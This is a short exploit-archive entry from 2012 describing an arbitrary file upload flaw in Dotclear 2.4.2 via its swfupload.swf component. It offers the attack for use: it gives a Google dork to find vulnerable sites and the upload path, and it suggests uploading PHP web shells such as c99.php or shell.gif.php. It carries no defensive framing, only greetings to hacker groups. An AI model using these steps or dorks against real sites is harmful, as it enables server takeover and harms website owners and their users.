Dotclear 2.4.2 Arbitrary File Upload Vulnerability



EKU-ID: 1548 CVE: OSVDB-ID:
Author: T0x!c Published: 2012-02-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#### # Exploit Title: dotclear-2.4.2 (Swf) File Upload Vulnerability
# Author: T0x!c
# Date: 2012/02/24
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork: "powered by dotclear"
# Vendor: http://fr.dotclear.org/download
# Version: 2.4.2
# Tested on: [Windows Xp]
####
# Exploit :
http://www.example.com/path/inc/swf/swfupload.swf
you can upload files with php extension.
Example: c99.php, shell.gif.php, etc...
=================================**AlgeriansHackers**==================================
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Nassim24Missil * Kalashinkov *
(exploit-id.com) , (1337day.com) , (dis9.com.com) ,  (Dz-Team.biz)
=======================================================================================